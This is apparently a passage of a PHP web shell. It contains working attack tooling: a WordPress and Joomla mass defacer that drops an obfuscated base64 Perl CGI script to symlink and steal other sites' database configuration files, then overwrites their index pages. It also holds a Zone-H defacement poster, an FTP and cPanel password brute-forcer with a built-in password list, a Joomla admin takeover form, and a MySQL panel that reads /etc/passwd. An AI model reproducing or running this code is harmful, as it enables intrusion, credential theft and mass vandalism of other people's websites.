'<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<center><div class="mybox" align="center"><form action="" method="post"><table><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><input class="inputzbut" type="submit" value="Attack !" name="Submit"></form></div></center>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists('curl_init')){echo "CURL ERROR\n";exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);}@ini_set('zlib.output_compression', 0);@ini_set('implicit_flush', 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];$sites=file($file);}
 echo <<<EOF
 <div align="center"><table width="67%"><tr><td align=center></td></tr></table><br><pre>
 EOF;
 if(!isset($_POST['defacer'])){
 echo <<<EOF
 <div class="mybox"><h2 class="k2ll33d2">Zone-H Poster</h2><form enctype="multipart/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer&nbsp;:</b></span><input class='inputz' name="defacer" type="text" value="$defacer" /><br/><table width='55%'><tr><td align='center'><span lang='en-us'><b>Domains:</b></span><p align='center'>&nbsp;<textarea rows='30' name='domains' placeholder=' put domains here' cols='50' class='inputz'></textarea><br/><span lang='en-us'><b>OR</b></span><br/>Submit form .txt file:<br/><input name="file" type="file" /><br><br/><br/><input class='inputzbut' type='submit' value='Send' name='submit'></p></td></tr></table></form></div>
 EOF;
 }$defacer=$_POST['defacer'];if(!$sites){echo '</pre>';exit;}$sites=array_unique(str_replace('http://','',$sites));$total=count($sites);echo "[+] Total unique domain: $total\n\n";$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';echo "\n";}}$d=$n+30;if($d>$total){$d=$total;}echo "=====================>[$d/$total]\n";for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo' [-]Error!....Retrying';echo "\n";sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() - $start;echo 'Done';echo "\n\n[*]Time: $end seconds\n";curl_multi_close($main);if($cli==0){echo '</pre></body></html>';}exit;}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5;
 set_time_limit(0);$submit=$_REQUEST['submit'];$users=$_REQUEST['users'];$pass=$_REQUEST['passwords'];$target=$_REQUEST['target'];$cracktype=$_REQUEST['cracktype'];if($target == ""){$target = "localhost";}?><div align="center"><form method="POST" style="border: 1px solid #000000"><br><?php function ftp_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "ftp://$host");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "<b>Connection Timed out</b>";exit;}elseif ( curl_errno($ch) == 0 ){print "<table width='67%'><tr><td align=center><b>Username ($user) | Password ($pass)</b></td></tr></table>";}curl_close($ch);}function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://$host:2082");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print "<b>Connection Timed out</b>";exit;}elseif ( curl_errno($ch) == 0 ){print "<table width='67%'><tr><td align=center><b>[+]Username ($user) | Password ($pass)</b></td></tr></table>";}curl_close($ch);}if(isset($submit) && !empty($submit)){if(empty($users) && empty($pass)){print "<p><b>Error : Check The Users and Password List</b></p>";exit;}if(empty($users)){print "<p><b>Error :Check The Users List</b></p>";exit;}if(empty($pass) ){print "<p><b>Error :Check The Password List</b></p>";exit;};$userlist=explode("\n",$users);$passlist=explode("\n",$pass);print "<b>[~] Wait ...</b><br><br>";foreach ($userlist as $user) {$pureuser = trim($user);foreach ($passlist as $password ) {$purepass = trim($password);if($cracktype == "ftp"){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == "cpanel"){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}}
 echo "<cecnter><div class='mybox'><h2 class='k2ll33d2'>The Cracker</h2><form method=POST action=''><table width='67%'><tr><td><br><p align='center'><b><span lang='en-us'>IP</span> :<input class='inputz' type='text' name='target' size='16' value=$target></b></p><div align='center'><p align='center'>users<textarea class='inputz' cols=20 rows=20 name='users'>";
 system('ls /var/mail');
 echo "</textarea>passwords<textarea class='inputz' cols=20 rows=20 name='passwords'>123123\n123456\n1234567\n12345678\n123456789\n159159\n112233\nadmin\n332211\n14789632\npasswd\n159357\n357951\n114477\npass\nPassword</textarea><br><br><input name='cracktype' value='cpanel' checked type='radio'></span><b>Cpanel(2082)</b><input name='cracktype' value='ftp' style='font-weight: 700;' type='radio'></font></font><font style='font-weight: 700;' size='2' face='Tahoma'><span style='font-weight: 700;'>Ftp (21)</span></p><br><center><input class='inputzbut' type='submit' value='Start Cracking' name='submit'></center></td></tr></table></td></tr></form></div></center>";die();}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'joomla')){if(empty($_POST['pwd'])){echo "<br><br><br><center><div class='mybox'><h2 class='k2ll33d2'>Joomla login changer</h2><FORM method='POST'><br><br><br>DB_Prefix :&nbsp;&nbsp;<INPUT class ='inputz' size='8' value='jos_' name='prefix' type='text'>&nbsp;host :&nbsp;&nbsp;<INPUT class ='inputz' size='10' value='localhost' name='localhost' type='text'>&nbsp;database :&nbsp;&nbsp;<INPUT class ='inputz' size='10' value='database' name='database' type='text'>&nbsp;username :&nbsp;&nbsp;<INPUT class ='inputz' size='10' value='db_user' name='username' type='text'>&nbsp;password :&nbsp;&nbsp;<INPUT class ='inputz' size='10' value='db_pass' name='password' type='text'><br>&nbsp;&nbsp;<br>New Username:&nbsp;&nbsp;<INPUT class ='inputz' name='admin' size='15' value='k2'><br><br>New Password:&nbsp;&nbsp;<INPUT class ='inputz' name='pwd' size='15' value='123123'><br><br>&nbsp;&nbsp;<INPUT value='change' class='inputzbut' name='send' type='submit'></FORM></div></center>";}else {$prefix = $_POST['prefix'];$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$admin = $_POST['admin'];$pd = ($_POST["pwd"]);$pwd = md5($pd);@mysql_connect($localhost,$username,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET username ='".$admin."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());$SQL=@mysql_query("UPDATE ".$prefix."users SET password ='".$pwd."' WHERE name = 'Super User' or name = 'Super Utilisateur' or id='62'") or die (mysql_error());if($SQL) echo "<br><br><center><h1>Done... go and login</h1></center>";}}
 elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
 while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
 foreach($tables as $table){$msg .= "<tr><td><a href='?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
 elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
 $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
 list($total) = mysql_fetch_row($hasil);
 if(isset($_GET['z'])) $page = (int) $_GET['z'];
 else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
 while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
 $data = "&nbsp;";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
 for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
 if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
 elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
 $msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$pwd."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
 if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
 for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
 if($rows[$j] == "") $dataz = "&nbsp;";
 else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
 else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
